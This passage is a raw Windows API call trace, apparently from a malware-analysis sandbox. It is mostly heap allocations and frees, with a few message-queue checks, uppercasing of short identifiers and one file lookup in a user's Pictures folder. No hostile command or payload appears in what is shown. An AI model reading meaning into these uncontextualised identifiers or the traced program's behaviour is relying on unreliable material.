(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.164] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0210.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0210.165] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.166] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/G_BhwPRnGbbQ-dfc.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde29fb10, ftCreationTime.dwHighDateTime=0x1d5d490, ftLastAccessTime.dwLowDateTime=0x44d1e970, ftLastAccessTime.dwHighDateTime=0x1d5cb74, ftLastWriteTime.dwLowDateTime=0x44d1e970, ftLastWriteTime.dwHighDateTime=0x1d5cb74, nFileSizeHigh=0x0, nFileSizeLow=0xfe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="G_BhwPRnGbbQ-dfc.bmp", cAlternateFileName="G_BHWP~1.BMP")) returned 0x9e2238 [0210.170] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0210.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.172] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.172] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0210.173] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.173] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 